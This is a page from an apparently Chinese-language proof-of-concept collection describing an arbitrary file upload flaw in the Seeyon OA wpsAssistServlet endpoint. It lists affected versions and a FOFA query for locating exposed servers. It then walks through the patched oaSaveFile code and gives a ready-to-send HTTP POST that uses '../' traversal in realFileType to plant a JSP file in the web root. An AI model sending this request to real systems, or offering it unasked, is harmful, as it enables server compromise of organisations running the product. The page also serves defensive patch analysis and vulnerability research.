admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 20:36:14 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/致远OA wpsAssistServlet 任意文件上传漏洞.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

83 lines
2.9 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 致远OA wpsAssistServlet 任意文件上传漏洞
## 漏洞描述
致远OA wpsAssistServlet接口存在任意文件上传漏洞攻击者通过漏洞可以发送特定的请求包上传恶意文件获取服务器权限
## 漏洞影响
```
致远OA A6、A8、A8N (V8.0SP2V8.1V8.1SP1)
致远OA G6、G6N (V8.1、V8.1SP1)
```
## FOFA
```
app="致远互联-OA" && title="V8.0SP2"
```
## 漏洞复现
产品主页
![image-20220824142723820](./images/202208241427877.png)
下载补丁220706-S004 ,对比修改的文件
![image-20220824142736294](./images/202208241427361.png)
主要修改的是 `com.seeyon.ctp.common.wpsassist.manager.WpsAssistManagerImpl.oaSaveFile` 这个方法
```
private Map<String, Object> oaSaveFile(HttpServletRequest request, Map<String, Object> param) throws Exception {
Map<String, Object> result = Maps.newHashMap();
result.put(BusinessKey.OfficeTransResultFlag.getCode(), (Object)null);
Long fileId = MapUtils.getLong(param, "fileId");
log.info("wpsAssist SaveFile start!fileId=" + fileId);
String newPdfFileId = MapUtils.getString(param, "newPdfFileId");
if (Strings.isNotBlank(newPdfFileId)) {
fileId = Long.valueOf(newPdfFileId);
}
String realFileType = MapUtils.getString(param, "realFileType");
String tempFileIdPathSuffix = SystemEnvironment.getSystemTempFolder() + File.separator + fileId + realFileType;
Long count = this.saveFileToPath(request, tempFileIdPathSuffix);
result.put(BusinessKey.FileSize.getCode(), count);
result.putAll(this.createOfficeTransCacheFile(fileId, tempFileIdPathSuffix, MapUtils.getString(param, "canTransFileType")));
param.put(BusinessKey.OfficeTransResultFlag.getCode(), result.get(BusinessKey.OfficeTransResultFlag.getCode()));
this.copyToUploadAndTrans(param);
return result;
}
```
向上追溯调用的 oaSaveFile方法的代码
![image-20220824142757449](./images/202208241427516.png)
![image-20220824142808032](./images/202208241428101.png)
`com.seeyon.ctp.common.wpsassist.WpsAssistServlet.doPost`flag参数为save时可以调用文件上传接口
![image-20220824142821539](./images/202208241428602.png)
`C://Seeyon/A6/base/temporary` 为默认上传的位置,但 `realFileType, fileId` 参数可控,可以通过 ../ 遍历上传到任意目录下验证POC
```
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/debugggg.jsp&fileId=2 HTTP/1.1
Host:
Content-Length: 349
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
Accept-Encoding: gzip
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="upload"; filename="123.xls"
Content-Type: application/vnd.ms-excel
<% out.println("seeyon_vuln");%>
--59229605f98b8cf290a7b8908b34616b--
```
![image-20220824142837723](./images/202208241428763.png)
![image-20220824142846959](./images/202208241428999.png)
Reference in New Issue View Git Blame Copy Permalink